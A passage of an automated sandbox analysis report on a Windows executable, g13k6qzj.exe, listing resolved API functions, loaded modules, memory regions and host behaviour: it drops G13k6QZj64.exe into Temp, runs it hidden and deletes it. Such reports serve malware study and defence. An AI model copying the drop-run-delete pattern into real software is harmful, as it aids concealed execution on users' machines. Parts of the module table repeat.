|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:02 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #152: g13k6qzj.exe
179
0
| Information | Value |
|---|---|
| ID | #152 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "PDIALOG.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:04, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcbc |
| Parent PID | 0x5d8 (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C90
0x
C74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00957fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x00ae0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x01eeffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x0208ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0xc54, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
